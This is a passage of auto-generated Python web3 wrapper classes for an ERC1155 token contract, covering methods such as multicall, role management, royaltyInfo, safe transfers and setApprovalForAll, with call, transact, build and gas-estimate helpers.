        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(req, signature).call(params)

    def send_transaction(
        self,
        req: ITokenERC1155MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        req, signature = self.validate_and_normalize_inputs(req, signature)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(req, signature).transact(params)

    def build_transaction(
        self,
        req: ITokenERC1155MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        req, signature = self.validate_and_normalize_inputs(req, signature)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(req, signature).buildTransaction(params)

    def estimate_gas(
        self,
        req: ITokenERC1155MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        req, signature = self.validate_and_normalize_inputs(req, signature)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(req, signature).estimateGas(params)
class MulticallMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the multicall method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, data: List[Union[bytes, str]]):
        """Validate the inputs to the multicall method."""
        self.validator.assert_valid(
            method_name="multicall",
            parameter_name="data",
            argument_value=data,
        )
        return data

    def call(
        self,
        data: List[Union[bytes, str]],
        tx_params: Optional[TxParams] = None,
    ) -> List[Union[bytes, str]]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (data) = self.validate_and_normalize_inputs(data)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(data).call(tx_params.as_dict())
        # BUG FIX: the generated code did
        # ``[Union[bytes, str](element) for element in returned]``, which
        # raises TypeError at runtime because typing.Union is not callable.
        # The elements decoded by web3 are already bytes, so return them
        # unchanged in a fresh list.
        return list(returned)

    def send_transaction(
        self,
        data: List[Union[bytes, str]],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (data) = self.validate_and_normalize_inputs(data)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(data).transact(tx_params.as_dict())

    def build_transaction(
        self,
        data: List[Union[bytes, str]],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (data) = self.validate_and_normalize_inputs(data)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(data).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        data: List[Union[bytes, str]],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (data) = self.validate_and_normalize_inputs(data)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(data).estimateGas(tx_params.as_dict())
class NameMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the name method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the contract's name as a string.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class NextTokenIdToMintMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the nextTokenIdToMint method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> int:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the next token id to be minted, as an integer.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class OwnerMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the owner method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the owner address as a string.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class PlatformFeeBpsMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the platformFeeBps method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> int:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the platform fee in basis points, as an integer.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class PlatformFeeRecipientMethod(
    ContractMethod
):  # pylint: disable=invalid-name
    """Various interfaces to the platformFeeRecipient method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the platform fee recipient address as a string.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class PrimarySaleRecipientMethod(
    ContractMethod
):  # pylint: disable=invalid-name
    """Various interfaces to the primarySaleRecipient method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class RenounceRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the renounceRole method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider.
        :param contract_address: address of the contract exposing the method.
        :param contract_function: the low-level contract function to wrap.
        :param validator: optional validator for method arguments.
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, role: Union[bytes, str], account: str
    ):
        """Validate the inputs to the renounceRole method.

        :param role: the role argument to validate.
        :param account: the account address, checksummed before use.
        :returns: the validated ``(role, account)`` pair.
        """
        self.validator.assert_valid(
            method_name="renounceRole",
            parameter_name="role",
            argument_value=role,
        )
        self.validator.assert_valid(
            method_name="renounceRole",
            parameter_name="account",
            argument_value=account,
        )
        account = self.validate_and_checksum_address(account)
        return (role, account)

    def call(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        This only simulates the method; nothing is returned.

        :param role: the role argument.
        :param account: the account address.
        :param tx_params: transaction parameters
        """
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(role, account).call(tx_params.as_dict())

    def send_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param role: the role argument.
        :param account: the account address.
        :param tx_params: transaction parameters
        """
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).estimateGas(
            tx_params.as_dict()
        )
class RevokeRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the revokeRole method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider.
        :param contract_address: address of the contract exposing the method.
        :param contract_function: the low-level contract function to wrap.
        :param validator: optional validator for method arguments.
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, role: Union[bytes, str], account: str
    ):
        """Validate the inputs to the revokeRole method.

        :param role: the role argument to validate.
        :param account: the account address, checksummed before use.
        :returns: the validated ``(role, account)`` pair.
        """
        self.validator.assert_valid(
            method_name="revokeRole",
            parameter_name="role",
            argument_value=role,
        )
        self.validator.assert_valid(
            method_name="revokeRole",
            parameter_name="account",
            argument_value=account,
        )
        account = self.validate_and_checksum_address(account)
        return (role, account)

    def call(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        This only simulates the method; nothing is returned.

        :param role: the role argument.
        :param account: the account address.
        :param tx_params: transaction parameters
        """
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(role, account).call(tx_params.as_dict())

    def send_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param role: the role argument.
        :param account: the account address.
        :param tx_params: transaction parameters
        """
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).estimateGas(
            tx_params.as_dict()
        )
class RoyaltyInfoMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the royaltyInfo method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider.
        :param contract_address: address of the contract exposing the method.
        :param contract_function: the low-level contract function to wrap.
        :param validator: optional validator for method arguments.
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, token_id: int, sale_price: int):
        """Validate the inputs to the royaltyInfo method.

        :param token_id: the token id; coerced to ``int``.
        :param sale_price: the sale price; coerced to ``int``.
        :returns: the validated ``(token_id, sale_price)`` pair.
        """
        self.validator.assert_valid(
            method_name="royaltyInfo",
            parameter_name="tokenId",
            argument_value=token_id,
        )
        # safeguard against fractional inputs
        token_id = int(token_id)
        self.validator.assert_valid(
            method_name="royaltyInfo",
            parameter_name="salePrice",
            argument_value=sale_price,
        )
        # safeguard against fractional inputs
        sale_price = int(sale_price)
        return (token_id, sale_price)

    def call(
        self,
        token_id: int,
        sale_price: int,
        tx_params: Optional[TxParams] = None,
    ) -> Tuple[str, int]:
        """Execute underlying contract method via eth_call.

        :param token_id: the token id.
        :param sale_price: the sale price.
        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (token_id, sale_price) = self.validate_and_normalize_inputs(
            token_id, sale_price
        )
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(token_id, sale_price).call(
            tx_params.as_dict()
        )
        return (
            returned[0],
            returned[1],
        )

    def send_transaction(
        self,
        token_id: int,
        sale_price: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param token_id: the token id.
        :param sale_price: the sale price.
        :param tx_params: transaction parameters
        """
        (token_id, sale_price) = self.validate_and_normalize_inputs(
            token_id, sale_price
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(token_id, sale_price).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        token_id: int,
        sale_price: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (token_id, sale_price) = self.validate_and_normalize_inputs(
            token_id, sale_price
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(token_id, sale_price).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        token_id: int,
        sale_price: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (token_id, sale_price) = self.validate_and_normalize_inputs(
            token_id, sale_price
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(token_id, sale_price).estimateGas(
            tx_params.as_dict()
        )
class SafeBatchTransferFromMethod(
    ContractMethod
):  # pylint: disable=invalid-name
    """Various interfaces to the safeBatchTransferFrom method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider.
        :param contract_address: address of the contract exposing the method.
        :param contract_function: the low-level contract function to wrap.
        :param validator: optional validator for method arguments.
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self,
        _from: str,
        to: str,
        ids: List[int],
        amounts: List[int],
        data: Union[bytes, str],
    ):
        """Validate the inputs to the safeBatchTransferFrom method.

        :param _from: the sender address, checksummed before use.
        :param to: the recipient address, checksummed before use.
        :param ids: the list of token ids.
        :param amounts: the list of transfer amounts.
        :param data: extra data forwarded to the method.
        :returns: the validated ``(_from, to, ids, amounts, data)`` tuple.
        """
        self.validator.assert_valid(
            method_name="safeBatchTransferFrom",
            parameter_name="from",
            argument_value=_from,
        )
        _from = self.validate_and_checksum_address(_from)
        self.validator.assert_valid(
            method_name="safeBatchTransferFrom",
            parameter_name="to",
            argument_value=to,
        )
        to = self.validate_and_checksum_address(to)
        self.validator.assert_valid(
            method_name="safeBatchTransferFrom",
            parameter_name="ids",
            argument_value=ids,
        )
        self.validator.assert_valid(
            method_name="safeBatchTransferFrom",
            parameter_name="amounts",
            argument_value=amounts,
        )
        self.validator.assert_valid(
            method_name="safeBatchTransferFrom",
            parameter_name="data",
            argument_value=data,
        )
        return (_from, to, ids, amounts, data)

    def call(
        self,
        _from: str,
        to: str,
        ids: List[int],
        amounts: List[int],
        data: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        This only simulates the method; nothing is returned.

        :param _from: the sender address.
        :param to: the recipient address.
        :param ids: the list of token ids.
        :param amounts: the list of transfer amounts.
        :param data: extra data forwarded to the method.
        :param tx_params: transaction parameters
        """
        (_from, to, ids, amounts, data) = self.validate_and_normalize_inputs(
            _from, to, ids, amounts, data
        )
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(_from, to, ids, amounts, data).call(
            tx_params.as_dict()
        )

    def send_transaction(
        self,
        _from: str,
        to: str,
        ids: List[int],
        amounts: List[int],
        data: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param _from: the sender address.
        :param to: the recipient address.
        :param ids: the list of token ids.
        :param amounts: the list of transfer amounts.
        :param data: extra data forwarded to the method.
        :param tx_params: transaction parameters
        """
        (_from, to, ids, amounts, data) = self.validate_and_normalize_inputs(
            _from, to, ids, amounts, data
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(_from, to, ids, amounts, data).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        _from: str,
        to: str,
        ids: List[int],
        amounts: List[int],
        data: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (_from, to, ids, amounts, data) = self.validate_and_normalize_inputs(
            _from, to, ids, amounts, data
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            _from, to, ids, amounts, data
        ).buildTransaction(tx_params.as_dict())

    def estimate_gas(
        self,
        _from: str,
        to: str,
        ids: List[int],
        amounts: List[int],
        data: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (_from, to, ids, amounts, data) = self.validate_and_normalize_inputs(
            _from, to, ids, amounts, data
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            _from, to, ids, amounts, data
        ).estimateGas(tx_params.as_dict())
class SafeTransferFromMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the safeTransferFrom method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider.
        :param contract_address: address of the contract exposing the method.
        :param contract_function: the low-level contract function to wrap.
        :param validator: optional validator for method arguments.
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self,
        _from: str,
        to: str,
        _id: int,
        amount: int,
        data: Union[bytes, str],
    ):
        """Validate the inputs to the safeTransferFrom method.

        :param _from: the sender address, checksummed before use.
        :param to: the recipient address, checksummed before use.
        :param _id: the token id; coerced to ``int``.
        :param amount: the transfer amount; coerced to ``int``.
        :param data: extra data forwarded to the method.
        :returns: the validated ``(_from, to, _id, amount, data)`` tuple.
        """
        self.validator.assert_valid(
            method_name="safeTransferFrom",
            parameter_name="from",
            argument_value=_from,
        )
        _from = self.validate_and_checksum_address(_from)
        self.validator.assert_valid(
            method_name="safeTransferFrom",
            parameter_name="to",
            argument_value=to,
        )
        to = self.validate_and_checksum_address(to)
        self.validator.assert_valid(
            method_name="safeTransferFrom",
            parameter_name="id",
            argument_value=_id,
        )
        # safeguard against fractional inputs
        _id = int(_id)
        self.validator.assert_valid(
            method_name="safeTransferFrom",
            parameter_name="amount",
            argument_value=amount,
        )
        # safeguard against fractional inputs
        amount = int(amount)
        self.validator.assert_valid(
            method_name="safeTransferFrom",
            parameter_name="data",
            argument_value=data,
        )
        return (_from, to, _id, amount, data)

    def call(
        self,
        _from: str,
        to: str,
        _id: int,
        amount: int,
        data: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        This only simulates the method; nothing is returned.

        :param _from: the sender address.
        :param to: the recipient address.
        :param _id: the token id.
        :param amount: the transfer amount.
        :param data: extra data forwarded to the method.
        :param tx_params: transaction parameters
        """
        (_from, to, _id, amount, data) = self.validate_and_normalize_inputs(
            _from, to, _id, amount, data
        )
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(_from, to, _id, amount, data).call(
            tx_params.as_dict()
        )

    def send_transaction(
        self,
        _from: str,
        to: str,
        _id: int,
        amount: int,
        data: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param _from: the sender address.
        :param to: the recipient address.
        :param _id: the token id.
        :param amount: the transfer amount.
        :param data: extra data forwarded to the method.
        :param tx_params: transaction parameters
        """
        (_from, to, _id, amount, data) = self.validate_and_normalize_inputs(
            _from, to, _id, amount, data
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(_from, to, _id, amount, data).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        _from: str,
        to: str,
        _id: int,
        amount: int,
        data: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (_from, to, _id, amount, data) = self.validate_and_normalize_inputs(
            _from, to, _id, amount, data
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            _from, to, _id, amount, data
        ).buildTransaction(tx_params.as_dict())

    def estimate_gas(
        self,
        _from: str,
        to: str,
        _id: int,
        amount: int,
        data: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (_from, to, _id, amount, data) = self.validate_and_normalize_inputs(
            _from, to, _id, amount, data
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            _from, to, _id, amount, data
        ).estimateGas(tx_params.as_dict())
class SaleRecipientForTokenMethod(
    ContractMethod
):  # pylint: disable=invalid-name
    """Various interfaces to the saleRecipientForToken method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider.
        :param contract_address: address of the contract exposing the method.
        :param contract_function: the low-level contract function to wrap.
        :param validator: optional validator for method arguments.
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, index_0: int):
        """Validate the inputs to the saleRecipientForToken method.

        :param index_0: the mapping key; coerced to ``int``.
        :returns: the validated ``index_0``.
        """
        self.validator.assert_valid(
            method_name="saleRecipientForToken",
            parameter_name="index_0",
            argument_value=index_0,
        )
        # safeguard against fractional inputs
        index_0 = int(index_0)
        return index_0

    def call(self, index_0: int, tx_params: Optional[TxParams] = None) -> str:
        """Execute underlying contract method via eth_call.

        :param index_0: the mapping key.
        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        # note: plain assignment — validate_and_normalize_inputs returns a
        # single value here, not a tuple
        index_0 = self.validate_and_normalize_inputs(index_0)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(index_0).call(tx_params.as_dict())
        return str(returned)

    def send_transaction(
        self, index_0: int, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param index_0: the mapping key.
        :param tx_params: transaction parameters
        """
        index_0 = self.validate_and_normalize_inputs(index_0)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(index_0).transact(tx_params.as_dict())

    def build_transaction(
        self, index_0: int, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        index_0 = self.validate_and_normalize_inputs(index_0)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(index_0).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, index_0: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        index_0 = self.validate_and_normalize_inputs(index_0)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(index_0).estimateGas(
            tx_params.as_dict()
        )
class SetApprovalForAllMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the setApprovalForAll method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Optional[Validator] = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider.
        :param contract_address: address of the contract exposing the method.
        :param contract_function: the low-level contract function to wrap.
        :param validator: optional validator for method arguments.
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, operator: str, approved: bool):
        """Validate the inputs to the setApprovalForAll method.

        :param operator: the operator address, checksummed before use.
        :param approved: the approval flag.
        :returns: the validated ``(operator, approved)`` pair.
        """
        self.validator.assert_valid(
            method_name="setApprovalForAll",
            parameter_name="operator",
            argument_value=operator,
        )
        operator = self.validate_and_checksum_address(operator)
        self.validator.assert_valid(
            method_name="setApprovalForAll",
            parameter_name="approved",
            argument_value=approved,
        )
        return (operator, approved)

    def call(
        self,
        operator: str,
        approved: bool,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        This only simulates the method; nothing is returned.

        :param operator: the operator address.
        :param approved: the approval flag.
        :param tx_params: transaction parameters
        """
        (operator, approved) = self.validate_and_normalize_inputs(
            operator, approved
        )
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(operator, approved).call(tx_params.as_dict())

    def send_transaction(
        self,
        operator: str,
        approved: bool,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
